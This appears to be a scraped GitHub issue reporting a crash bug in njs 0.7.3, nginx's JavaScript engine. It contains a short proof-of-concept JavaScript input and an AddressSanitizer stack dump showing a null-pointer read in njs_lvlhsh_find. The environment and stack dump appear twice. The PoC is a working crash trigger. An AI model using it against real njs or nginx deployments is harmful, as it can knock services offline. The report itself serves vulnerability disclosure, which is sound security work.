You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
OS : Linux leanderwang-LC2 5.13.0-30-generic #33~20.04.1-Ubuntu SMP Mon Feb 7 14:25:10 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : f65981b
Version : 0.7.3
Build :
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"
PoC
functionmain(){varv4=[1.0];//key pointv4[64240]=1;varv10=newInt8Array();varv12=v4.splice(v10,5.0,...4096);varv27=` function v28(v29) { var v34 = {"__proto__":v27}; } `;varv42=newInt8Array(v12,1,v12,1,1);varv43=` var v44 = Uint16Array.isExtensible(1,1,v43,1); `;}main();
Stack dump
AddressSanitizer:DEADLYSIGNAL
==770430==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55f6511ff5e8 bp 0x7fff6a7876f0 sp 0x7fff6a7876b0 T0)
==770430==The signal is caused by a READ memory access.
==770430==Hint: address points to the zero page.
#0 0x55f6511ff5e7 in njs_lvlhsh_find src/njs_lvlhsh.c:176 #1 0x55f65124f2af in njs_object_property src/njs_object_prop.c:59 #2 0x55f65120a883 in njs_value_to_primitive src/njs_value.c:159 #3 0x55f65131a8c2 in njs_value_to_number src/njs_value_conversion.h:18 #4 0x55f65131a8c2 in njs_typed_array_alloc src/njs_typed_array.c:171 #5 0x55f65131e4c8 in njs_typed_array_constructor src/njs_typed_array.c:229 #6 0x55f65127461c in njs_function_native_call src/njs_function.c:739 #7 0x55f65121a0fb in njs_vmcode_interpreter src/njs_vmcode.c:788 #8 0x55f651273aba in njs_function_lambda_call src/njs_function.c:703 #9 0x55f65121a0fb in njs_vmcode_interpreter src/njs_vmcode.c:788 #10 0x55f6512140ba in njs_vm_start src/njs_vm.c:553 #11 0x55f6511fd3f8 in njs_process_script src/njs_shell.c:890 #12 0x55f6511fdebf in njs_process_file src/njs_shell.c:619 #13 0x55f6511ff21f in main src/njs_shell.c:303 #14 0x7fb4e6e39082 in __libc_start_main ../csu/libc-start.c:308 #15 0x55f6511fac4d in _start (/home/wz/njs/njs/build/njs+0x4bc4d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/njs_lvlhsh.c:176 in njs_lvlhsh_find
==770430==ABORTING
Environment
OS : Linux leanderwang-LC2 5.13.0-30-generic #33~20.04.1-Ubuntu SMP Mon Feb 7 14:25:10 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : f65981b
Version : 0.7.3
Build :
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"
PoC
Stack dump
AddressSanitizer:DEADLYSIGNAL
==770430==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55f6511ff5e8 bp 0x7fff6a7876f0 sp 0x7fff6a7876b0 T0)
==770430==The signal is caused by a READ memory access.
==770430==Hint: address points to the zero page.
#0 0x55f6511ff5e7 in njs_lvlhsh_find src/njs_lvlhsh.c:176
#1 0x55f65124f2af in njs_object_property src/njs_object_prop.c:59
#2 0x55f65120a883 in njs_value_to_primitive src/njs_value.c:159
#3 0x55f65131a8c2 in njs_value_to_number src/njs_value_conversion.h:18
#4 0x55f65131a8c2 in njs_typed_array_alloc src/njs_typed_array.c:171
#5 0x55f65131e4c8 in njs_typed_array_constructor src/njs_typed_array.c:229
#6 0x55f65127461c in njs_function_native_call src/njs_function.c:739
#7 0x55f65121a0fb in njs_vmcode_interpreter src/njs_vmcode.c:788
#8 0x55f651273aba in njs_function_lambda_call src/njs_function.c:703
#9 0x55f65121a0fb in njs_vmcode_interpreter src/njs_vmcode.c:788
#10 0x55f6512140ba in njs_vm_start src/njs_vm.c:553
#11 0x55f6511fd3f8 in njs_process_script src/njs_shell.c:890
#12 0x55f6511fdebf in njs_process_file src/njs_shell.c:619
#13 0x55f6511ff21f in main src/njs_shell.c:303
#14 0x7fb4e6e39082 in __libc_start_main ../csu/libc-start.c:308
#15 0x55f6511fac4d in _start (/home/wz/njs/njs/build/njs+0x4bc4d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/njs_lvlhsh.c:176 in njs_lvlhsh_find
==770430==ABORTING
Credit
xmzyshypnc(@xmzyshypnc) P1umer(@P1umer)
The text was updated successfully, but these errors were encountered: